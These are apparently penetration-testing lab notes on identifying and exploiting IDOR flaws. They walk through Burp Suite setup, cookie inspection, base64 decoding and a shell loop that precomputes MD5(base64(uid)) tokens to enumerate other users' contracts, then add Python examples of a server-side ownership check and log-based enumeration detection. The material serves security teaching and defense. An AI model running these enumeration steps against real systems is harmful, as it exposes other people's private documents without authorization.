#IDOR identification & testing: Plain-Text URL Parameter value
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: ?uid=1 or ?filename=file_1.pdf
* study the HTTP requests to look for URL parameters or APIs with an object reference
- this may also be found in other HTTP headers, like cookies.
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid={arbitraryValue} or ?filename=file_{arbitraryValue}.pdf
* try incrementing the values of the object references to retrieve other data
#walk the application
root@htb:~$ BROWSER > {targetSite:port}
Services
We provide services to operate manufacturing data such as quotes,
customer requests etc. Please login to get access to the service.
* no visible login page identified
#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
Search: Proxy
root@oco:~$ BROWSER > Network Settings > Settings
Configure Proxy Access to the Internet
Manual Proxy Configuration: enabled
HTTP Proxy: 127.0.0.1
Port: 8080 {default Burp listening port}
Also Use this Proxy for HTTPS: enabled
* it is advisable to also check the option "Also use this proxy for FTP and HTTPS" in order to have all requests go through Burp Suite
#step 2: disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
Intercept is on: disabled
* Burp's intercept is enabled by default
#step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}
* can also simply refresh the page if already on the target site
#step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
http://10.129.203.93
-> /
-> cdn-cgi
-> login
-> script.js
-> css
-> js
-> themes
#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest
* can also brute force the page
* identify possible entry points on the webapp
- Account page
Access ID Name Email
2233 guest guest@megacorp.com
- Uploads page; this requires admin privileges
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
name value
role guest ...
user 2233 ...
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
* the guest account ID is shown; the admin ID can be enumerated by changing the ID value manually or through automated means
#IDOR identification & testing: Base64 encoded
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: ?filename=ZmlsZV8xMjMucGRm
root@oco:~$ echo -n "ZmlsZV8xMjMucGRm" | base64 -d
file_123.pdf
root@oco:~$ echo -n file_124.pdf | base64
ZmlsZV8xMjQucGRm
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?filename=ZmlsZV8xMjQucGRm
#IDOR identification & testing: HASHED
root@oco:~$ BROWSER > {targetSite:port}/...
URL parameter: download.php?filename=c81e728d9d4c2f636f067f89cc14862c
* use a hash identifier
- https://hashes.com/en/tools/hash_identifier
* hashing is a one-way function and can't be reversed
#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port}
Documents
Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
<li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/contracts.php > CTRL+U
<li class="pure-tree_link">...
...
javascript:downloadContract('1')
function downloadContract(uid) {
$.redirect("/download.php", {
contract: CryptoJS.MD5(btoa(uid)).toString(),
}, "POST", "_self");
}
* this function sends a POST request with the contract parameter. The value it sends is an MD5 hash computed with the CryptoJS library.
The value being hashed is btoa(uid), the base64-encoded string of the uid variable, which is the function's input argument.
The page calls downloadContract('1'), so the final value used in the POST request is the base64-encoded string of 1, which is then MD5 hashed.
#IDOR identification & testing
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
Request
...
POST /download.php HTTP/1.1
Host: 94.237.62.184:42702
Origin: http://94.237.62.184:42702
Content-Type: application/x-www-form-urlencoded
Referer: http://94.237.62.184:42702/
uid=1
* ALT: on some occasions the data is in an encoded form such as:
- data
- contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
- uid=MQ%3D%3D
- URL
- /download.php?contract=MQ%3D%3D
root@oco:~$ echo -n 1 | base64 -w 0 | md5sum | tr -d ' -'
cdd96d3cc73d1dbdaffa03cc6cd7339b
* the -n flag excludes the trailing newline from echo's output (a newline would change the base64 string and therefore the hash)
* the -w 0 flag with base64 disables line wrapping so no newlines are added to the encoded output
* compare this with the hash on the HTTP request (if used)
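The encoding chain from downloadContract() and the shell one-liner above, reproduced in Python together with the server-side check that actually stops the IDOR. This is an added example, not code from the original notes or from the target application: the contract-to-owner mapping, the account ids and the function names are constructed sample values, and the response filename pattern simply mirrors the Content-Disposition header seen later in the notes.

```python
"""Reproduce the encoded / hashed object references and show the missing
authorization check.

Added example, not code from the original notes. The client-side chain
`CryptoJS.MD5(btoa(uid))` is mirrored with Python's standard library, then
a server-side ownership check resolves the reference back to its owner and
compares that owner with the authenticated user. All data is constructed.
"""
import base64
import hashlib


def b64_reference(value: str) -> str:
    """Equivalent of `echo -n <value> | base64 -w 0` (and of JavaScript's btoa())."""
    return base64.b64encode(value.encode()).decode()


def decode_b64_reference(token: str) -> str:
    """Equivalent of `echo -n <token> | base64 -d`."""
    return base64.b64decode(token).decode()


def contract_token(uid: int) -> str:
    """Equivalent of `CryptoJS.MD5(btoa(uid)).toString()` in downloadContract(),
    i.e. `echo -n <uid> | base64 -w 0 | md5sum`."""
    return hashlib.md5(b64_reference(str(uid)).encode()).hexdigest()


# Constructed sample data: contract uid -> owning account id.
CONTRACT_OWNERS = {1: 2233, 2: 2233, 3: 4401}

# Reverse lookup from token to contract uid. Hashing the reference is not a
# control: anyone who knows the scheme can precompute tokens for 1..N, exactly
# as the shell loop in the notes does. Only the ownership check below helps.
TOKEN_TO_UID = {contract_token(uid): uid for uid in CONTRACT_OWNERS}


def authorize_download(session_user: int, token: str) -> tuple[int, str]:
    """Server-side ownership check; returns an (HTTP status, detail) pair.

    The reference is honoured only if it resolves to a contract owned by the
    authenticated session user. Skipping this comparison is the IDOR.
    """
    uid = TOKEN_TO_UID.get(token)
    if uid is None:
        return 404, "unknown contract"
    if CONTRACT_OWNERS[uid] != session_user:
        return 403, f"contract {uid} does not belong to account {session_user}"
    # Filename pattern mirrors the Content-Disposition seen in the notes: contract_<md5(uid)>.pdf
    return 200, f"contract_{hashlib.md5(str(uid).encode()).hexdigest()}.pdf"


if __name__ == "__main__":
    print(decode_b64_reference("ZmlsZV8xMjMucGRm"))        # file_123.pdf
    print(contract_token(1))                                  # value sent by downloadContract('1')
    for uid in range(1, 4):
        print(uid, authorize_download(2233, contract_token(uid)))
```

Running the module decodes the base64 filename from the notes, prints the token for uid 1, and then shows account 2233 being served contracts 1 and 2 but refused contract 3 even though it presented a perfectly valid token.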
#test manual download
root@oco:~$ for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
cdd96d3cc73d1dbdaffa03cc6cd7339b
0b7e7dee87b1c3b98e72131173dfbbbf
0b24df25fe628797b3a50ae0724d2730
f7947d50da7a043693a592b4db43b0a1
8b9af1f7f76daf0f02bd9c48c4a2e3d0
006d1236aee3f92b8322299796ba1989
b523ff8d1ced96cef9c86492e790c2fb
d477819d240e7d3dd9499ed8d23e7158
3e57e65a34ffcb2e93cb545d024f5bde
5d4aace023dc088767b4e08c79415dcd
* compare each output to the values on the Repeater
BURP > Repeater
Request
...
GET /download.php?contract=MQ%3D%3D HTTP/1.1
Host: 94.237.62.184:34855
Referer: http://94.237.62.184:34855/contracts.php
Response
HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 03:13:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
Pragma: public
Content-Type: application/pdf
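Seen from the server, the loop above produces one client fetching many distinct contract references within seconds. The following added example (not part of the original notes) shows how that pattern stands out in web server access logs. The log lines are constructed in Apache combined format and reuse the token values from the loop; the threshold, window and field layout are assumptions to tune for a real deployment.

```python
"""Flag clients that enumerate many distinct object references in a short window.

Added example, not part of the original notes. Parses constructed Apache
combined-format lines, groups download.php requests by client IP, and reports
any IP that requested more than `threshold` distinct `contract` values inside
a sliding time window. Threshold and window size are assumed values.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: 10.0.0.5 walks tokens for uid 1..6 (one repeated),
# 10.0.0.9 fetches a single document, and one line carries no contract parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Dec/2024:03:13:20 +0000] "GET /contracts.php HTTP/1.1" 200 2210
10.0.0.5 - - [31/Dec/2024:03:13:21 +0000] "GET /download.php?contract=cdd96d3cc73d1dbdaffa03cc6cd7339b HTTP/1.1" 200 5120
10.0.0.5 - - [31/Dec/2024:03:13:22 +0000] "GET /download.php?contract=0b7e7dee87b1c3b98e72131173dfbbbf HTTP/1.1" 200 4871
10.0.0.5 - - [31/Dec/2024:03:13:22 +0000] "GET /download.php?contract=0b24df25fe628797b3a50ae0724d2730 HTTP/1.1" 200 4410
10.0.0.5 - - [31/Dec/2024:03:13:23 +0000] "GET /download.php?contract=f7947d50da7a043693a592b4db43b0a1 HTTP/1.1" 200 4902
10.0.0.5 - - [31/Dec/2024:03:13:24 +0000] "GET /download.php?contract=8b9af1f7f76daf0f02bd9c48c4a2e3d0 HTTP/1.1" 200 3300
10.0.0.5 - - [31/Dec/2024:03:13:25 +0000] "GET /download.php?contract=006d1236aee3f92b8322299796ba1989 HTTP/1.1" 200 5004
10.0.0.5 - - [31/Dec/2024:03:13:26 +0000] "GET /download.php?contract=cdd96d3cc73d1dbdaffa03cc6cd7339b HTTP/1.1" 200 5120
10.0.0.9 - - [31/Dec/2024:03:14:02 +0000] "GET /download.php?contract=8b9af1f7f76daf0f02bd9c48c4a2e3d0 HTTP/1.1" 200 3300
garbage line that does not match the format
"""


def parse_requests(log_text: str, param: str) -> list[tuple[str, datetime, str]]:
    """Return (ip, timestamp, param value) for every request carrying `param`."""
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        qs = parse_qs(urlsplit(m["path"]).query)
        if param not in qs:
            continue  # not an object-reference request
        out.append((m["ip"], datetime.strptime(m["ts"], TS_FMT), qs[param][0]))
    return out


def find_enumeration(log_text: str, param: str = "contract",
                     threshold: int = 5, window_seconds: int = 60) -> dict[str, int]:
    """Map ip -> max number of distinct `param` values seen within one window,
    for IPs at or above `threshold`. Repeated downloads of the same reference
    do not count; only distinct references indicate enumeration."""
    by_ip: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for ip, ts, val in parse_requests(log_text, param):
        by_ip[ip].append((ts, val))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        counts: dict[str, int] = defaultdict(int)
        left, best = 0, 0
        for ts, val in events:
            counts[val] += 1
            # slide the left edge forward until the window fits
            while (ts - events[left][0]).total_seconds() > window_seconds:
                old = events[left][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                left += 1
            best = max(best, len(counts))
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, n in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct contract references within the window")
```

The same logic transfers to the plaintext case (?uid=1, ?filename=file_1.pdf) by changing `param`; pairing the count with the share of 403 responses, once the ownership check from the previous example is in place, gives a much stronger signal than volume alone.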